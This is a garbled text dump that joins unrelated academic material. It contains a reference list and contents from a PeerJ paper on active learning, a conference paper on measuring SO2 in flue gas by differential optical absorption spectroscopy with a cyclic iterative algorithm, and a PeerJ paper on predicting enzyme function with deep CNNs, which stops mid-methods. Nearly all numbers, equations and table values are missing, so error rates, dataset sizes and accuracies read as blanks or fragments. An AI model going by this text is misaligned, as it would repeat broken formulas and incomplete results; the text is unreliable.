artificial intelligence and machine learning ( ): – . settles b, craven m. . an analysis of active learning strategies for sequence labeling tasks. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . shannon ce. . a mathematical theory of communication. bell system technical journal ( ): – . thompson wr. . on the likelihood that one unknown probability exceeds another in view of the evidence of two samples. biometrika ( – ): – doi . /biomet/ . - . . tran a. . photometric classification with thompson sampling. available at https://github.com/ chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran honours-thesis.pdf. xu z, akella r, zhang y. . incorporating diversity and density in active learning for relevance feedback. in: european conference on information retrieval. berlin/heidelberg: springer, – . tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /biomet/ . - . https://github.com/chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran honours-thesis.pdf https://github.com/chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran honours-thesis.pdf https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
Contents: Combining active learning suggestions — Introduction; Overview of active learning; Combining suggestions; Experimental protocol; Results; Discussion; Conclusion; Appendix A: Posterior balanced accuracy; References.
International Conference on Sensor Network and Computer Engineering (ICSNCE)

Research and Application of an SO2 Concentration Monitoring Algorithm in Flue Gas

Wang Qinqin, School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China
Su Xiaohui, School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China

Abstract—This paper focuses on the calculation of the SO2 concentration in flue gas. Among the many methods available for flue-gas detection, the paper first introduces the basic differential optical absorption spectroscopy (DOAS) technique. Then, to address the problem of overlapping absorption between different gases in the flue gas, a cyclic iterative algorithm is used to measure the SO2 concentration. It is concluded that the basic DOAS algorithm has a large error for concentration measurement of mixed gases with overlapping absorption, with the error above %. The cyclic iterative algorithm, however, handles this case well: it reaches a stable result after three iterations, and the measurement error can finally be controlled within %.

Keywords—differential optical absorption spectroscopy; SO2 monitoring; mixed gas; spectral overlap absorption; cyclic iterative algorithm

I. Introduction

With the rapid development of industry and the growing human impact on the environment, air pollution is becoming more and more serious. Monitoring the harmful gases in the atmosphere is therefore a prerequisite for controlling and treating pollution. At present, portable gas-analysis equipment is mainly used for flue-gas analysis, and differential optical absorption spectroscopy (DOAS) is the most common and effective method for real-time detection of gas concentrations in the atmosphere via the characteristic absorption of molecules in the near-ultraviolet region [1]. The traditional DOAS algorithm suffers from large errors when measuring gas concentrations over short paths and at low concentrations. To lower the limit of detection, enhance the environmental adaptability of portable flue-gas analyzers, and improve measurement accuracy, Wang Kunpeng designed a portable gas analyzer based on an AVR micro-controller and increased its detection accuracy and environmental adaptability [2]. Deng Meng developed a portable gas analyzer based on non-dispersive ultraviolet absorption with improved resolution and stability for monitoring low-concentration SO2 in high humidity [3]. Wang Jing designed a concentration-calculation method based on least squares on top of the DOAS algorithm, suitable for short optical paths and low SO2 concentrations [4]. Zhou Mi verified the monitoring accuracy of the Fourier-transform infrared method for low-concentration SO2 in straw-burning flue gas [5]. Yan Yue's experiments showed that a BP neural network optimized with AdaBoost works well for monitoring the SO2 concentration in the presence of interference [6]. To separate and calculate gas concentrations from the absorption spectrum of a mixed gas, Xu Shuping designed a portable smoke analyzer based on a cyclic iterative algorithm, which can calculate the concentrations of several gases simultaneously and has strong anti-interference ability [7].
Wang Yingjian designed a multi-scale discrete wavelet decomposition method with strong independence and obtained accurate SO2 concentrations free from the absorption interference of NO gas [8].

In this paper, a portable flue-gas analyzer is used as the experimental instrument to study methods for measuring the SO2 content in factory exhaust emissions. The experiment mainly investigates the DOAS absorption model and the cyclic iterative algorithm in order to obtain an effective method for measuring the SO2 concentration in a mixed gas, thereby providing technical support for monitoring factory exhaust emissions and reducing air pollution.

II. Differential Absorption Spectrometry

Differential optical absorption spectroscopy was proposed by U. Platt of the Institute of Environmental Physics at Heidelberg University in Germany. The basic procedure is as follows: first, irradiate the substance under test with a beam of light; then select the characteristic absorption wavelength of the gas; finally, calculate the gas absorbance and from it the concentration. The theory is based on the Lambert-Beer law.

A. Lambert-Beer Law

The basic principle of the Lambert-Beer law is that when a beam of parallel monochromatic light passes perpendicularly through an absorbing material, the medium absorbs part of the light, so the original intensity is weakened; the thicker the medium and the higher the concentration, the more the light intensity decreases [ ]. The specific expression is

A = \log \frac{I_0}{I} = K l c

where A is the absorbance, I_0 is the intensity of the incident light, I is the transmitted light intensity, K is the absorption coefficient (a constant), l is the thickness of the medium, and c is the concentration of the absorbing material.

Let I_0(λ) be the original light intensity, I(λ) the received light intensity, and σ(λ) the absorption cross section of the gas to be measured. The mathematical model of the spectral absorption of a single gas can then be expressed as

I(\lambda) = I_0(\lambda) \exp[-\sigma(\lambda)\, c\, l]

The Lambert-Beer law applies only to the concentration measurement of a single gas and requires an interference-free experimental environment. In the actual measurement process, however, the measured material is usually a mixture containing several kinds of interfering impurities such as aerosols and solid particles.

B. Actual Spectral Absorption Model

Because of the non-uniform refractive index, light entering an inhomogeneous medium is scattered, which reduces its transmittance; this includes Rayleigh scattering and Mie scattering, which appear as broadband and narrowband structures in the optical spectrum. It is therefore necessary to establish a spectral absorption model for actual conditions. Let i index the gas species, and introduce the extinction coefficients ε_R(λ) for Rayleigh scattering and ε_M(λ) for Mie scattering. The absorption model for the gas mixture is then

I(\lambda) = I_0(\lambda) \exp\Big[-l \Big( \sum_i \sigma_i(\lambda)\, c_i + \varepsilon_R(\lambda) + \varepsilon_M(\lambda) \Big)\Big]

For analysis and calculation, the absorption cross section is decomposed into a rapidly varying part and a slowly varying part, so that high-pass filtering removes the influence of Rayleigh and Mie scattering.
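As a small illustration of inverting the single-gas model above for concentration (a sketch only; the numerical values and function names are assumptions, not from the paper):

```python
import numpy as np

def absorbance(i0, i):
    """Absorbance A = log10(I0 / I) for incident and transmitted intensities."""
    return np.log10(i0 / i)

def concentration_single_gas(i0, i, sigma, path_length):
    """Invert I = I0 * exp(-sigma * c * l) for a single absorbing gas."""
    optical_depth = np.log(i0 / i)   # natural log, matching the exponential model
    return optical_depth / (sigma * path_length)

# Toy numbers (illustrative only): cross section 1e-19 cm^2, a 10 cm cell,
# and 20% attenuation at the chosen wavelength.
print(concentration_single_gas(i0=1.0, i=0.8, sigma=1e-19, path_length=10.0))
```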
Let the absorbance of the gas to be measured be D(λ). The actual absorbance model is then

D(\lambda) = \ln\left[\frac{I_0(\lambda)}{I(\lambda)}\right] = l \sum_i \sigma_i'(\lambda)\, c_i

From this formula it can be seen that the differential optical density D is linear in the differential absorption cross section σ_i'(λ) within a certain concentration range. Although the differential absorption method can accurately calculate the concentration of most gases, the loss of the slowly varying part of the absorption spectrum during filtering can produce erroneous concentration results. It is therefore necessary to study other concentration-inversion methods to improve the measurement precision of the gas composition.

III. Cyclic Iterative Algorithm

Absorbance is additive: when the gases form a mixture and each gas absorbs light at a particular wavelength, the total absorbance equals the sum of the absorbances of the components [ ]. Based on this superposition property of absorption spectra, the cyclic iterative algorithm gradually eliminates the interference between gas species through successive cycles of calculation and finally approaches the true concentration of each gas.

C. The Model of the Cyclic Iterative Algorithm

This paper mainly studies the concentration measurement of SO2 in mixed gases with overlapping absorption characteristics. The experiment considers only the interference of NO on the spectral absorption of SO2 in a band of the near-ultraviolet region. The two standard gases, SO2 and NO, are added one by one, and their absorption spectra are shown in the figure below.

[Figure: absorption spectrogram of SO2 and NO — intensity (counts) versus wavelength (nm), together with the zero-gas baseline.]

As the figure shows, although both NO and SO2 absorb light at the two chosen wavelengths, the absorption intensities are very different: the absorbance of NO at the first wavelength (call it λ_N) is much greater than its absorbance at the second wavelength (λ_S), while the absorbance of SO2 at λ_S is much greater than its absorbance at λ_N [ ]. Therefore, at λ_N the absorption of NO can be treated as the main absorption and the absorption of SO2 as an interference; conversely, at λ_S the absorption of SO2 is the main absorption and the absorption of NO is the interference.

The basic calculation steps of the cyclic iteration method are as follows. Initially, at λ_N, the total absorbance A(λ_N) is taken to be the absorbance of NO.
Step 1: at λ_N, obtain the concentration of NO from its assumed absorbance by looking up the calibration table.
Step 2: at λ_S, obtain the absorbance of NO implied by that NO concentration.
Step 3: at λ_S, subtract this NO absorbance from the total absorbance A(λ_S) to obtain the absorbance of SO2.
Step 4: at λ_S, obtain the concentration of SO2 from its absorbance by looking up the calibration table.
Step 5: at λ_N, obtain the absorbance of SO2 implied by that SO2 concentration.
Step 6: at λ_N, subtract this SO2 absorbance from A(λ_N) to obtain a refined absorbance of NO.
Repeating steps one to six yields increasingly accurate values of the SO2 concentration. This algorithm can calculate the concentration of each component of the SO2/NO mixture, and it is also suitable for concentration measurement of any mixed gas; a minimal sketch of the loop is given below.
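The following Python sketch mirrors the six steps; the function names, calibration lookups, and the wavelength labels λ_N / λ_S are illustrative assumptions rather than the paper's implementation.

```python
def cyclic_iteration(a_total_n, a_total_s,
                     conc_no_from_abs, abs_no_at,
                     conc_so2_from_abs, abs_so2_at,
                     n_iter=3):
    """Separate SO2 and NO concentrations from total absorbances at two wavelengths.

    a_total_n, a_total_s : total measured absorbance at the NO-dominant wavelength
        (lambda_N) and at the SO2-dominant wavelength (lambda_S).
    conc_no_from_abs, conc_so2_from_abs : calibration lookups, absorbance -> concentration.
    abs_no_at, abs_so2_at : calibration lookups, (concentration, wavelength) -> absorbance.
    """
    a_no_n = a_total_n                            # start: attribute all of A(lambda_N) to NO
    for _ in range(n_iter):
        c_no = conc_no_from_abs(a_no_n)           # step 1: NO concentration at lambda_N
        a_no_s = abs_no_at(c_no, "lambda_S")      # step 2: NO absorbance implied at lambda_S
        a_so2_s = a_total_s - a_no_s              # step 3: SO2 absorbance at lambda_S
        c_so2 = conc_so2_from_abs(a_so2_s)        # step 4: SO2 concentration at lambda_S
        a_so2_n = abs_so2_at(c_so2, "lambda_N")   # step 5: SO2 absorbance implied at lambda_N
        a_no_n = a_total_n - a_so2_n              # step 6: refined NO absorbance at lambda_N
    return c_so2, c_no
```

With linear calibrations the lookups reduce to multiplying or dividing by a slope; in practice they would be interpolated from the measured absorbance-concentration tables.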
IV. Design of the Experimental System

The experimental system mainly consists of a light source, a spectrometer, optical fibers, and a computer. First, the light source is switched on, and the light emitted from the optical fiber passes through a double-convex lens, becoming parallel light that passes through the measured gas. Next, the light is focused by a focusing lens and enters the spectrometer. Finally, the spectrometer converts the optical signal into an electrical signal and sends it to the computer, which collects and processes the spectral signal. The experimental setup and system flow are shown in the figures below.

[Figure: experimental device diagram.]
[Figure: flow chart of the experimental system — UV light source → optical fiber → air chamber (gas entry / exhaust fume) → optical fiber → spectrometer → data line → computer.]

In the experiment, the dark spectrum is first measured with the light source not passing into the spectrometer. Then the gas is added and the light source is opened, so that the light enters the air chamber through the optical fiber. As the gas absorbs, the number of transmitted photons decreases correspondingly, and the number of absorbed photons changes with the gas concentration. Finally, the transmitted light enters the spectrometer, where the optical signal is converted into an electrical signal and sent to the computer for display. The original absorption spectrum is obtained by averaging the absorption spectrum over many acquisitions, and subtracting the dark spectrum from the original spectrum gives the actual spectrum.

V. Experimental Research and Result Analysis

To verify the feasibility and practicality of the DOAS and cyclic iteration algorithms, we compare their results and accuracy through experiments and summarize the advantages and disadvantages of each algorithm.

D. Research on Curve Fitting

The Lambert-Beer law provides a linear relationship between gas absorbance and concentration. In practice this linear relationship does not always hold, because of various influencing factors; the curve-fitting method is therefore used to fit the measured data. To improve the efficiency of the algorithm, the photon counts recorded in the experiment are first converted into an absorbance. Because the dark spectrum is contained in the spectrum recorded once the light source is on, the dark spectrum must be removed from the original spectrum when calculating the absorbance and concentration of the substance to be measured. The absorbance is calculated as

A(\lambda) = \lg \frac{R(\lambda) - D(\lambda)}{S(\lambda) - D(\lambda)}

where A is the absorbance, R is the number of incident photons, S is the number of transmitted photons, λ is the wavelength, and D is the dark noise. In this paper only the effect of NO on the absorption spectrum of SO2 is considered. A mixture of NO and SO2 is used in the experiment, with two standard gas concentrations. By measuring the gas absorption spectra, the concentration-absorbance curve of each gas at a given wavelength can be fitted, and a fitting data table obtained for each gas. A sketch of the absorbance computation is given below.
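The following sketch (Python/NumPy; the array names are illustrative assumptions) computes that per-wavelength absorbance from an incident spectrum, a transmitted spectrum, and the dark spectrum:

```python
import numpy as np

def absorbance_spectrum(incident, transmitted, dark):
    """Per-wavelength absorbance A(λ) = lg[(R(λ) - D(λ)) / (S(λ) - D(λ))].

    incident    : photon counts R(λ) of the incident (reference) light
    transmitted : photon counts S(λ) recorded with the measured gas in the cell
    dark        : dark spectrum D(λ) recorded with the light source off
    All three arrays share the same wavelength grid, e.g. averaged over many scans.
    """
    incident, transmitted, dark = map(np.asarray, (incident, transmitted, dark))
    return np.log10((incident - dark) / (transmitted - dark))
```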
the fitting formula is as follows:  pccc c a ca i i i   i i i i  among them, p is the change rate of average absorbance along with increasing concentration, ci+ is the gas concentration, ia is a absorbance of gas to be measured. as long as there are two points ii ca   i i  ca on the measured curve, the relationship between concentration and absorbance can be fitted. at nm and nm,the relationship figures between concentration and absorbance of so and no can be obtained by using excel, respectively. as shown in figure and (horizontal coordinate is concentration, ordinate is absorbance). international conference on sensor network and computer engineering (icsnce ) figure . data relationship between concentration and absorbance of no . figure . data relationship between concentration and absorbance of so . e. experimental results and analysis in the experiment, firstly, we should turn off the light source and measure the dark spectrum. then, measure the original spectrum. finally, two kinds of mixed gas with different ratio of so and no are introduced to measure the spectral data. the mixed concentrations of so are ppm and ppm, respectively. the mixed concentrations of no are ppm and ppm, respectively. then, the concentration of the measured spectral data is respectively calculated by using doas and cyclic iterative algorithm. the so concentration under the interference of no as shown in table i. the iterative results of cyclic iteration algorithm are shown in table ii. table i. the comparison of measured concentration with actual values of so computational method standard value standard value measured value measured deviation(%) measured value measured deviation(%) doas . . % . . % cyclic iterative algorithm . . % . . % table ii. the results of cyclic iterative algorithm iterations st time nd time rd time th time firstgroup so (ppm) . . . . no (ppm) . . . . second group so (ppm) . . . . no (ppm) . . . . in the experiment, doas and cyclic iteration algorithms are used to invert the concentration of so in the mixture gas respectively. according to table i, under the interference of no gas, with the increase of no concentration, the greater the deviation, the lower the measurement accuracy. it is shown that the error is more than % when the doas method is used to measure the so concentration in the mixed gas. combined with table i and table ii, the results show that the inversion effect of doas method for the mixture gas concentration with overlapping absorption is not satisfactory. on the contrary, the accuracy of the cyclic iteration algorithm is the highest, and the content of the mixed components can be accurately measured international conference on sensor network and computer engineering (icsnce ) by only three cycles, and the measurement deviation is finally within %. vi. summary of the paper in order to find a method with high detection accuracy and good calculation efficiency, this paper mainly study the concentration monitoring method of so in flue gas. first, the advantages and disadvantages of the current equipment and algorithm of smoke composition detection can be obtained. then, the basis theoretical and calculation principle of doas are introduced in detail. next, according to the actual detection environment, a cyclic iterative algorithm is designed for the spectral absorption characteristics of measured gas. 
finally, the spectral data are obtained through experiments, and use the doas method and cyclic iteration algorithm to calculate the concentration of so . it is concluded that the cyclic iteration algorithm is superior to the content monitoring of so in flue gas, and greatly reduces the calculation deviation, finally control the error within %. the cyclic iteration algorithm is not only suitable for the concentration monitoring of the gas in the paper. it has a high accuracy for the detection of exhaust gas emissions in industrial production, especially for the concentration measurement of the of various components in the mixed gases with overlapping absorption spectra. the study results provide a good technology for industrial development and environmental protection. it make the factory exhaust gas to reach the safety target, and reduce the air pollution. acknowledgment provincial science and technology project, shaan’xi provincial education department project ( jf ). references [ ] sun liqun, chen kexin, yang huadong, “on-line detection of atmospheric trace gases based on differential absorption light spectrum,” j.applied optics, vol. , no. , jan. , pp. - . [ ] wang kunpeng, wang xianzhong, design of portable smoke detector based on avr microcontroller. d. zhengzhou: zhengzhou university, . [ ] deng meng. “application and research of portable flue gas analyzer based on non-dispersive ultraviolet absorption method in flue gas sulfur dioxide monitoring,” j. comprehensive utilization of chinese resources, vol. , no , feb. , pp. - . [ ] wang jing, huang yunbiao, “ the study on low concentration so on-line monitoring technology based on doas,” j.optics technology, vol. , no. , nov. , pp. - . [ ] zhou mi, yang xi, zhang minghui,“discussion on the monitoring method of sulfur dioxide in sinter smoke,” j.fine chemical intermediate, vol. , no. , apr. , pp. - . [ ] yan yue, yan shi, yang yongbin,jiang bin, “application ofadaboost integrated bp neural network in the detection of so concentration in thermal power plant,”transducer and micro-system technologies, vol. , no. , may. , pp. - . [ ] xu shuping, liu yushu,“a portable gas analyzer based on cyclic iterative algorithm,” j. journal of xi'an technological university, vol. , no. , jul. , pp. - . [ ] wang yingjian, feng hailiang,concentration monitoring of mixed gas of sulfur dioxide and nitricoxide based on uv absorption spectrum, d. chongqing: chongqing university, . [ ] jiang xuqian, wang qingbao, design of portable ultraviolet flue gas analyzer, d. nanjing: nanjing university of science and technology , . [ ] chen bin, wang zhihua, design of uv flue gas analyzer,d. nanjing: nanjing university of science and technology, . submitted august accepted june published july corresponding author evangelia i. zacharaki, evangelia.zacharaki@centralesupelec.fr academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright zacharaki distributed under creative commons cc-by . open access prediction of protein function using a deep convolutional neural network ensemble evangelia i. zacharaki center for visual computing, centralesupélec and galen team, inria saclay, france abstract background. the availability of large databases containing high resolution three- dimensional ( d) models of proteins in conjunction with functional annotation allows the exploitation of advanced supervised machine learning techniques for automatic protein function prediction. methods. 
in this work, novel shape features are extracted representing protein structure in the form of local (per amino acid) distributions of angles and amino acid distances, respectively. each of the multi-channel feature maps is introduced into a deep convolutional neural network (cnn) for function prediction and the outputs are fused through support vector machines or a correlation-based k-nearest neighbor classifier. two different architectures are investigated employing either one cnn per multi-channel feature set, or one cnn per image channel.
results. cross validation experiments on single-functional enzymes (n= , ) from the pdb database achieved . % correct classification, demonstrating an improvement over previous results on the same dataset when sequence similarity was not considered.
discussion. the automatic prediction of protein function can provide quick annotations on extensive datasets, opening the path for relevant applications such as pharmacological target identification. the proposed method shows promise for structure-based protein function prediction, but sufficient data may not yet be available to properly assess the method's performance on non-homologous proteins and thus reduce the confounding factor of evolutionary relationships.
subjects bioinformatics, computational biology, data mining and machine learning
keywords enzyme classification, function prediction, deep learning, convolutional neural networks, structure representation
introduction
metagenomics has led to a huge increase in protein databases and the discovery of new protein families (godzik, ). while the number of newly discovered, but possibly redundant, protein sequences rapidly increases, experimentally verified functional annotation of whole genomes remains limited. protein structure, i.e., the d configuration of the chain of amino acids, is a very good predictor of protein function, and in fact a more reliable predictor than protein sequence because it is far more conserved in nature (illergård, ardell & elofsson, ). by now, the number of proteins with functional annotation and experimentally determined structure of their native state (e.g., by nmr spectroscopy or x-ray crystallography) is adequately large to allow machine learning models to be trained that will be able to perform automatic functional annotation of unannotated proteins (amidi et al., ). also, as the number of protein sequences rapidly grows, the overwhelming majority of proteins can only be annotated computationally. in this work, enzymatic structures from the protein data bank (pdb) are considered and the enzyme commission (ec) number is used as a fairly complete framework for annotation. the ec number is a numerical classification scheme based on the chemical reactions the enzymes catalyze, proven by experimental evidence (webb, ). there have been plenty of machine learning approaches in the literature for automatic enzyme annotation.
a systematic review on the utility and inference of various computational methods for functional characterization is presented in sharma & garg ( ), while a comparison of machine learning approaches can be found in yadav & tiwari ( ). most methods use features derived from the amino acid sequence and apply support vector machines (svm) (cai et al., ; han et al., ; dobson & doig, ; chen et al., ; zhou et al., ; lu et al., ; lee et al., ; qiu et al., ; wang et al., ; wang et al., ; amidi et al., ), k-nearest neighbor (knn) classifier (huang et al., ; shen & chou, ; nasibov & kandemir-cavas, ), classification trees/forests (lee et al., ; kumar & choudhary, ; nagao, nagano & mizuguchi, ; yadav & tiwari, ), and neural networks (volpato, adelfio & pollastri, ). in borgwardt et al. ( ) sequential, structural and chemical information was combined into one graph model of proteins which was further classified by svm. however, there has been little work in the literature on automatic enzyme annotation based only on structural information. a bayesian approach (borro et al., ) for enzyme classification using structure derived properties achieved % accuracy. amidi et al. ( ) obtained . % classification accuracy on , proteins from the pdb database when they used only structural information. in the past few years, deep learning techniques, and particularly convolutional neural networks, have rapidly become the tool of choice for tackling many challenging computer vision tasks, such as image classification (krizhevsky, sutskever & hinton, ). the main advantage of deep learning techniques is the automatic exploitation of features and tuning of performance in a seamless fashion, that simplifies the conventional image analysis pipelines. cnns have recently been used for protein secondary structure prediction (spencer, eickholt & cheng, ; li & shibuya, ). in spencer, eickholt & cheng ( ) prediction was based on the position-specific scoring matrix profile (generated by psi-blast), whereas in li & shibuya ( ) d convolution was applied on features related to the amino acid sequence. also, a deep cnn architecture was proposed in lin, lanchantin & qi ( ) to predict protein properties. this architecture used a multilayer shift-and-stitch technique to generate fully dense per-position predictions on protein sequences. to the best of the author’s knowledge, deep cnns have not been used for prediction of protein function so far. in this work the author exploits experimentally acquired structural information of enzymes and apply deep learning techniques in order to produce models that predict enzymatic function based on structure. novel geometric descriptors are introduced and the efficacy of the approach is illustrated by classifying a dataset of , enzymes from zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the pdb database into the l = primary categories: oxidoreductases (ec ), transferases (ec ), hydrolases (ec ), lyases (ec ), isomerases (ec ), ligases (ec ). the novelty of the proposed method lies first in the representation of the d structure as a ‘‘bag of atoms (amino acids)’’ which are characterized by geometric properties, and secondly in the exploitation of the extracted feature maps by deep cnns. 
although assessed for enzymatic function prediction, the method is not based on enzyme-specific properties and therefore can be applied (after re-training) for automatic large-scale annotation of other d molecular structures, thus providing a useful tool for data-driven analysis. in the following sections more details on the implemented framework are first provided, including the representation of protein structure, the cnn architecture and the fusion process of the network outputs. then the evaluation framework and the obtained results are presented, followed by some discussion and conclusions. methods data-driven cnn models tend to be domain agnostic and attempt to learn additional feature bases that cannot be represented through any handcrafted features. it is hypothesized that by combining ‘‘amino acid specific’’ descriptors with the recent advances in deep learning we can boost model performance. the main advantage of the proposed method is that it exploits complementarity in both data representation phase and learning phase. regarding the former, the method uses an enriched geometric descriptor that combines local shape features with features characterizing the interaction of amino acids on this d spatial model. shape representation is encoded by the local (per amino acid type) distribution of torsion angles (bermejo, clore & schwieters, ). amino acid interactions are encoded by the distribution of pairwise amino acid distances. while the torsion angles and distance maps are usually calculated and plotted for the whole protein (bermejo, clore & schwieters, ), in the current approach they are extracted for each amino acid type separately, therefore characterizing local interactions. thus, the protein structure is represented as a set of multi-channel images which can be introduced into any machine learning scheme designed for fusing multiple d feature maps. moreover, it should be noted that the utilized geometric descriptors are invariant to global translation and rotation of the protein, therefore previous protein alignment is not required. our method constructs an ensemble of deep cnn models that are complementary to each other. the deep network outputs are combined and introduced into a correlation- based knn classifier for function prediction. for comparison purposes, support vector machines were also implemented for final classification. two system architectures are investigated in which the multiple image channels are considered jointly or independently, as will be described next. both architectures use the same cnn structure (within the highlighted boxes) which is illustrated in fig. . representation of protein structure the building blocks of proteins are amino acids which are linked together by peptide bonds into a chain. the polypeptide folds into a specific conformation depending on the interactions between its amino acid side chains which have different chemistries. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the deep cnn ensemble for protein classification. in this framework (architecture ) each multi-channel feature set is introduced to a cnn and results are combined by knn or svm classification. the network includes layers performing convolution (conv), batch normalization (bnorm), rectified lin- ear unit (relu) activation, dropout (optionally) and max-pooling (pool). details are provided in ‘classi- fication by deep cnns’. 
many conformations of this chain are possible due to the rotation of the chain about each carbon (cα) atom. for structure representation, two sets of feature maps were used. they express the shape of the protein backbone and the distances between the protein building blocks (amino acids). the use of global rotation and translation invariant features is preferred over features based on the cartesian coordinates of atoms, in order to avoid prior protein alignment, which is a bottleneck in the case of large datasets with proteins of several classes (unknown reference template space). the feature maps were extracted for every amino acid being present in the dataset including the standard amino acids, as well as asparagine/aspartic (asx), glutamine/glutamic (glx), and all amino acids with unidentified/unknown residues (unk), resulting in m= amino acids in total. torsion angles density the shape of the protein backbone was expressed by the two torsion angles of the polypeptide chain which describe the rotations of the polypeptide backbone around the bonds between n-cα (angle φ) and cα-c (angle ψ). all amino acids in the protein were grouped according to their type and the density of the torsion anglesφ andψ(∈[− , ]) was estimated for each amino acid type based on the d sample histogram of the angles (also known as ramachandran diagram) using equally sized bins (number of bins ha= ). the histograms were not normalized by the number of instances, therefore their values indicate the frequency of each amino acid within the polypeptide chain. in the obtained feature maps (xa), with dimensionality [ha×ha×m], the number of amino acids (m) corresponds to the number of channels. smoothness in the density function was achieved by moving average filtering, i.e., by convoluting the density map with a d gaussian kernel (σ = . ). zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. density of amino acid distances for each amino acid ai,i= ,...,m, distances to amino acid aj,j= ,...,m, in the protein are calculated based on the coordinates of the cα atoms for the residues and stored as an array dij. since the size of the proteins varies significantly, the length of the array dij is different across proteins, thus not directly comparable. in order to standardize measurements, the sample histogram of dij is extracted (using equally sized bins) and smoothed by convolution with a d gaussian kernel (σ = . ). the processing of all pairs of amino acids resulted in feature maps (xd) of dimension [m×m×hd], where hd = is the number of histogram bins (considered as number of channels in this case). classification by deep cnns feature extraction stage of each cnn the cnn architecture employs three computational blocks of consecutive convolutional, batch normalization, rectified linear unit (relu) activation, dropout (optionally) and max-pooling layers, and a fully-connected layer. the convolutional layer computes the output of neurons that are connected to local regions in the input in order to extract local features. it applies a d convolution between each of the input channels and a set of filters. the d activation maps are calculated by summing the results over all channels and then stacking the output of each filter to produce the output d volume. batch normalization normalizes each channel of the feature map by averaging over spatial locations and batch instances. the relu layer applies an element-wise activation function, such as the max( ,x) thresholding at zero. 
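before the remaining layers are described, the two feature-map computations introduced above (per-amino-acid-type ramachandran histograms and per-pair cα distance histograms) can be sketched with numpy/scipy as follows; the bin counts, the maximum distance, the gaussian widths and the residue input format are illustrative assumptions, since the exact values are not legible in the text above.

```python
import numpy as np
from scipy.ndimage import gaussian_filter

AMINO_ACIDS = ["ALA", "ARG", "ASN", "ASP", "ASX"]  # truncated list; the paper uses every type

def torsion_feature_maps(residues, n_bins=36, sigma=1.0):
    """Unnormalized 2D (phi, psi) histograms per amino acid type, smoothed with a
    Gaussian kernel. residues: iterable of (aa_type, phi_deg, psi_deg)."""
    maps = np.zeros((n_bins, n_bins, len(AMINO_ACIDS)))
    edges = np.linspace(-180.0, 180.0, n_bins + 1)
    for aa, phi, psi in residues:
        if aa in AMINO_ACIDS:
            i = int(np.clip(np.searchsorted(edges, phi) - 1, 0, n_bins - 1))
            j = int(np.clip(np.searchsorted(edges, psi) - 1, 0, n_bins - 1))
            maps[i, j, AMINO_ACIDS.index(aa)] += 1
    for k in range(maps.shape[2]):
        maps[:, :, k] = gaussian_filter(maps[:, :, k], sigma)
    return maps  # shape [n_bins, n_bins, m]; channels = amino acid types

def distance_feature_maps(residues_ca, n_bins=20, max_dist=60.0, sigma=1.0):
    """Histograms of pairwise C-alpha distances for every ordered pair of amino acid
    types. residues_ca: iterable of (aa_type, xyz) with xyz an array-like of length 3."""
    m = len(AMINO_ACIDS)
    maps = np.zeros((m, m, n_bins))
    edges = np.linspace(0.0, max_dist, n_bins + 1)
    coords = [(AMINO_ACIDS.index(aa), np.asarray(xyz, dtype=float))
              for aa, xyz in residues_ca if aa in AMINO_ACIDS]
    for i, xi in coords:
        for j, xj in coords:
            d = np.linalg.norm(xi - xj)
            b = int(np.clip(np.searchsorted(edges, d) - 1, 0, n_bins - 1))
            maps[i, j, b] += 1
    # smooth along the distance (histogram) axis only
    return gaussian_filter(maps, sigma=(0.0, 0.0, sigma))
```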
the dropout layer is used to randomly drop units from the cnn during training to reduce overfitting. dropout was used only for the xa feature set. the pooling layer performs a downsampling operation along the spatial dimensions in order to capture the most relevant global features with fixed length. the max operator was applied within a [ × ] neighborhood. the last layer is fully-connected and represents the class scores. training and testing stage of each cnn the output of each cnn is a vector of probabilities, one for each of the l possible enzymatic classes. the cnn performance can be measured by a loss function which assigns a penalty to classification errors. the cnn parameters are learned to minimize this loss averaged over the annotated (training) samples. the softmax loss function (i.e., the softmax operator followed by the logistic loss) is applied to predict the probability distribution over categories. optimization was based on an implementation of stochastic gradient descent. at the testing stage, the network outputs after softmax normalization are used as class probabilities. fusion of cnn outputs using two different architectures two fusion strategies were implemented. in the first strategy (architecture ) the two feature sets, xa and xd, are each introduced into a cnn, which performs convolution at all channels, and then the l class probabilities produced for each feature set are combined into a feature vector of length l∗ . in the second strategy (architecture ), each one of the (m= or hd = ) channels of each feature set is introduced independently into a cnn and the obtained class probabilities are concatenated into a vector of l∗m features for xa zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table cross-validation accuracy (in percentage) in predicting main enzymatic function using the deep cnn ensemble. architecture architecture class samples linear-svm knn linear-svm knn ec , . . . . ec , . . . . ec , . . . . ec , . . . . ec , . . . . ec , . . . . total , . . . . and l∗hd features for xd, respectively. these two feature vectors are further combined into a single vector of length l∗(m+hd) (= ). for both architectures, knn classification was applied for final class prediction using as distance measure between two feature vectors, x and x , the metric −cor(x ,x ), where cor is the sample spearman’s rank correlation. the value k= was selected for all experiments. for comparison, fusion was also performed with linear svm classification (chang & lin, ). the code was developed in matlab environment and the implementation of cnns was based on matconvnet (vedaldi & lenc, ). results the protein structures (n= , ) were collected from the pdb. only enzymes that occur in a single class were processed, whereas enzymes that perform multiple reactions and are hence associated with multiple enzymatic functions were excluded. since protein sequence was not examined during feature extraction, all enzymes were considered without other exclusion criteria, such as small sequence length or homology bias. the dataset was unbalanced in respect to the different classes. the number of samples per class is shown in table . the dataset was split into five folds. four folds were used for training and one for testing. the training samples were used to learn the parameters of the network (such as the weights of the convolution filters), as well as the parameters of the subsequent classifiers used during fusion (svm or knn model). 
